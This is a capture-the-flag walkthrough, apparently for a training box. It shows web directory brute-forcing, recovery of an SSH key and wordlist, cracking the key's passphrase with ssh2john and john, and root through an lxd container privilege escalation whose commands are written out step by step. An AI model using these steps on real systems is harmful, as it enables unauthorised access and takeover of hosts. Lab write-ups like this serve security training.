Not to much to go on. Let's have a look at the website.
After looking around and clicking there wasn't much to go on. However looking at the page source we find a name!
But, I'm not convinced that's all we need just yet. Let's run a feroxbuster and see if we can find something.
Nice! Uploads and Secret. Let's have a look
Let's take a look at secret first.
SecretKey looks promising
We got a ssh key. That can't be a bad thing. Before we try ssh'ing in let's check out uploads also.
manifesto.txt gives us a little clip of the actual hacker manifesto
Then a meme for meme.jpg lol. We can come back and check that if we need to. Not going to waste time on it unless we get stuck.
Let's check out the more interesting file in Uploads, dict.lst
And now we have what looks like a password list we can use.
Alright let's try to put all this together and see what happens. We have a name, a password list and an ssh key. We should be good now.....hopefully
Let's grab that dict.lst first
Okay so when we try to login with john and the ssh key we found it ask's us for a password.
So, let's run ssh2john on our ssh key and see if we can then use john to crack the password.
Once we have a hash for john to crack we can then use the following command to crack the hash
I just tried with john's standard dictionary and it cracked it very quickly. But it also worked with the supplied dict also.
Now we should be able to login via ssh with johns creds.
And we are in!
We can now print out the user.txt easily
Now let's get root!
After looking around for a while and running linpeas it looks like the best path to take is an lxc/lxd priv esc method.
We're going to follow the exploit from HackTricks step by step to hopefully get root.
Step 1. on our attack machine.
sudo apt update sudo apt install -y git golang-go debootstrap rsync gpg squashfs-tools
git clone https://github.com/lxc/distrobuilder
cd distrobuilder make
Prepare the creation of alpine
mkdir -p $HOME/ContainerImages/alpine/ cd $HOME/ContainerImages/alpine/ wget https://raw.githubusercontent.com/lxc/lxc-ci/master/images/alpine.yaml
Create the Container
sudo $HOME/go/bin/distrobuilder build-lxd alpine.yaml -o image.release=3.8
Start a python3 server to serve up the created files
python3 -m http.server 80
Step 2. on our target machine
Upload the vulnerable server files to the target machine
Add the Image
lxc image import lxd.tar.xz rootfs.squashfs --alias alpine
View the new image
lxc image list
Create a Container and add root path
lxc init alpine privesc -c security.privileged=true --alias=alpine
Let's make sure it worked
Let's add the root path now
xc config device add privesc host-root disk source=/ path=/mnt/root recursive=true
Let's Execute the Container
lxc start privesc lxc exec privesc /bin/sh
Now, let's run ID and WHOAMI
WE ARE ROOT!
We are in a mounted container so we have to do a little weird navigation here but nothing to bad.
And we have our root flag!